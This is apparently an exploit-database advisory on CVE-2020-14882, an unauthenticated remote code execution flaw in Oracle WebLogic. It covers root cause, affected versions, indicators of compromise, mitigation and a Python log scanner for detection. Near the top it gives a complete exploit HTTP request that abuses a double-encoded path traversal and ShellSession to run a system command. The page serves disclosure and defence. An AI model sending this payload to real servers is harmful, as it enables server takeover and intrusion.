## https://sploitus.com/exploit?id=F60F47DE-0A09-59E0-B958-8DA532E06CA9
# 🌐 **CVE-2020-14882: Oracle WebLogic Server Remote Code Execution**

---

### 🧩 Overview

**CVE-2020-14882** is a **critical unauthenticated Remote Code Execution (RCE)** vulnerability in **Oracle WebLogic Server's Administration Console**.
An attacker can exploit it remotely, without any login credentials, using a specially crafted HTTP request to gain full control of the server.

* **Vendor:** Oracle
* **Component:** WebLogic Server Console
* **CVSS v3.1 Score:** 9.8 (Critical)
* **Disclosure Date:** October 2020
* **Attack Vector:** Network (HTTP request)
* **Authentication Required:** None

---

### βš™οΈ Requests 

```
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128

_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");
```

---

### βš™οΈ Affected Versions

The following WebLogic Server versions are known to be vulnerable:

* 10.3.6.0.0
* 12.1.3.0.0
* 12.2.1.3.0
* 12.2.1.4.0
* 14.1.1.0.0

(Other patch levels or customized builds may also be at risk if not updated.)

---

### 🧠 Root Cause & Technical Details

The flaw lies in the **WebLogic Administration Console**'s improper input validation.
By sending a **specially crafted URL** with **double URL encoding**, an attacker can **bypass authentication and access internal server functions**.

Typical exploit path example:

```
/console/css/%252e%252e%252fconsole.portal
```

Here `%252e%252e%252f` represents a **double-encoded directory traversal sequence**, allowing the attacker to escape the normal path and reach sensitive console code.
Once accessed, this can trigger remote command execution or webshell upload.

---

### 💣 Impact

* **Full remote code execution** with the privileges of the WebLogic process.
* **No authentication** required.
* **Complete system compromise** possible: attackers can deploy malware, steal data, or pivot deeper into the network.

Common exploitation results:

* Deployment of JSP-based **webshells**
* **Cryptomining** or **ransomware** installation
* **Persistence mechanisms** added to compromised systems

---

### 🕓 Timeline of Events

* **October 2020:** Oracle releases a Critical Patch Update addressing CVE-2020-14882.
* **Within days:** Public proof-of-concept (PoC) exploits appear online.
* **Following weeks:** Massive wave of exploitation observed, with attackers scanning and exploiting exposed WebLogic servers globally.
* **Subsequent months:** Used in several major attack campaigns (cryptominers, ransomware, espionage).

---

### πŸ” Detection & Indicators of Compromise

**1. Access Logs**
Look for suspicious HTTP requests containing encoded traversal sequences such as:

```
%252e%252e%252fconsole
```

or

```
/console/css/.../console.portal
```

**2. File System Changes**

* Unrecognized `.jsp` files appearing under application directories.
* New or altered `.war` deployments.

**3. Process Activity**

* The WebLogic `java` process spawning shell commands (`/bin/sh`, `cmd.exe`).
* Unexpected outbound network connections from the WebLogic host.

**4. Persistence Artifacts**

* Suspicious scheduled tasks or startup scripts.
* Communication with mining pools or command-and-control servers.

---

### πŸ›‘οΈ Mitigation & Remediation

**Immediate Actions:**

1. **Patch Immediately:** Apply Oracle's October 2020 Critical Patch Update or later cumulative patches.
2. **Restrict Access:** Limit WebLogic Console access to trusted IPs or management networks only.
3. **Block Exploits:** Use a WAF or proxy rule to block requests containing encoded traversal patterns such as `%252e%252e%252f`.
4. **Disable Console** if not required in production.

**If Compromise Is Suspected:**

* Isolate the affected system from the network.
* Search logs and file systems for IOCs mentioned above.
* Rebuild the system from a known-good image.
* Rotate credentials and check for lateral movement.

---

### 🧰 Example Detection Pattern

Regular expression for scanning logs:

```
(%25(2e|2E)){2}%25(2f|2F)
```

This captures **double-encoded “../” traversal** attempts often used in CVE-2020-14882 exploits. Each dot is encoded separately (`%252e`), so the `%25` prefix must be repeated inside the `{2}` group; a pattern of the form `%25(2e|2E){2}` would only match the string `%252e2e` and miss the real `%252e%252e%252f` (and its uppercase `%252E%252E%252F` form seen in the request above).
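The access-log check from the Detection section and the regex above, carried into a small scanner. This is an added example, not code from the original page: the log layout, function names and sample lines are assumptions, and it goes one step beyond the regex by also double-decoding the path so single-encoded and mixed variants of the same `..` traversal to `console.portal` are flagged.

```python
import re
from urllib.parse import unquote

# Each "." of "../" is percent-encoded twice (%25 + 2e), so the "%25" prefix must
# repeat with every "2e"; this is the corrected form of the page's regex.
DOUBLE_ENCODED_TRAVERSAL = re.compile(r"(?:%252[eE]){2}%252[fF]")

# Assumed common/combined access-log layout: client, ident, user, [timestamp], "request", status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_twice(path):
    """Resolve the path the way a double-encoded traversal is meant to be resolved."""
    return unquote(unquote(path))


def is_console_traversal(path):
    """True if the request reaches console.portal via a '..' segment, either in the
    raw double-encoded form or after decoding (also catches single-encoded/mixed forms)."""
    if DOUBLE_ENCODED_TRAVERSAL.search(path):
        return True
    decoded = decode_twice(path.split("?", 1)[0])
    return "/console/" in decoded and "/../" in decoded and decoded.endswith("console.portal")


def scan_access_log(lines):
    """Return (client, method, raw path, status) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_console_traversal(m.group("path")):
            hits.append((m.group("ip"), m.group("method"), m.group("path"), m.group("status")))
    return hits


# Constructed sample lines (RFC 5737 documentation addresses), not real log data.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Oct/2020:10:15:02 +0000] "POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1" 200 512',
    '203.0.113.7 - - [29/Oct/2020:10:15:05 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true HTTP/1.1" 200 1201',
    '198.51.100.3 - - [29/Oct/2020:10:16:11 +0000] "GET /console/css/%2e%2e/console.portal HTTP/1.1" 403 0',
    '192.0.2.10 - admin [29/Oct/2020:10:20:30 +0000] "GET /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 8820',
    '192.0.2.11 - - [29/Oct/2020:10:21:00 +0000] "GET /console/css/admin.css HTTP/1.1" 200 2310',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("%s %s %s -> HTTP %s" % hit)
```

A 403 on a traversal attempt (as in the third sample line) is still worth alerting on: the request shape alone identifies scanning for this bug, patched or not.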

---

### 🧱 Defense-in-Depth Recommendations

* **Patch Management:** Keep WebLogic up to date and test patches before deployment.
* **Segmentation:** Keep administrative consoles off public networks.
* **Monitoring:** Enable detailed logging and feed data to your SIEM.
* **Incident Response Plan:** Prepare automated alerts for abnormal console access patterns.

---

### 🚨 Why It's Important

CVE-2020-14882 remains a textbook example of a **critical enterprise RCE**: easy to exploit, devastating in impact, and widely weaponized.
It underscores the need for **prompt patching**, **network isolation of management interfaces**, and **continuous monitoring** for exploitation attempts.

---